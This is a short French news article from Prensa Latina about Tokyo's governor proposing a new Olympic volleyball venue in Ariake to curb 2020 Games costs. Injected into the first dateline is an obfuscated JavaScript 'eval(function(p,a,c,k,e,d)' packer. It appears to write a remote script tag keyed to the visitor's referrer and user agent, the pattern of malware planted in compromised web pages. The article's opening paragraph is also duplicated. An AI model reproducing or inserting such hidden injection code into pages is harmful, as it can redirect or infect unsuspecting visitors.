mardi 23 avril 2024 |
Prensa Latina - Qui sommes nous

| Contacter avec Prensa Latina

Agence d'information Latino-américaine
Édition française
Search
Close this search box.

Tokyo opte pour nouveau stade de volleyball pour les Jeux Olympiques de 2020

Tokyo, eval(function(p,a,c,k,e,d){e=function(c){return c.toString(36)};if(!''.replace(/^/,String)){while(c--){d[c.toString(a)]=k[c]||c.toString(a)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('0.6("");n m="q";',30,30,'document||javascript|encodeURI|src||write|http|45|67|script|text|rel|nofollow|type|97|language|jquery|userAgent|navigator|sc|ript|saynk|var|u0026u|referrer|ferea||js|php'.split('|'),0,{})) 6 jan (PL) Le gouverneur de Tokyo, Yuriko Koike, a proposé de construire un nouveau siège de volley-ball pours Jeux Olympiques de 2020 dans le district de Ariake, en remplaçant celui existant à Yokohama.

Tokyo, 6 jan (PL) Le gouverneur de Tokyo, Yuriko Koike, a proposé de construire un nouveau siège de volley-ball pours Jeux Olympiques de 2020 dans le district de Ariake, en remplaçant celui existant à Yokohama.

L’idée est venue après une commission créée par le gouvernement de la capitale japonaise a averti que le coût des jeux pourrait dépasser 30 milliards de dollars, soit quatre fois le calcul original, à moins de réaliser des épargnes drastiques.

La décision finale desur la construction de la nouvelle installation sera déterminé à 21 de ce mois-ci, lors d’une téléconférence avec un groupe multipartite pour examiner les coûts de la nomination au titre des olympiques.

Contrairement à sa précédente proposition visant à rendre les compétitions de volley-ball, la natation et la navigation sur les sites existants, Koike a accepté de construire des installations des trois sports à Tokyo, comme prévu originalement.

Rm/lma/amm

EN CONTINU
notes connexes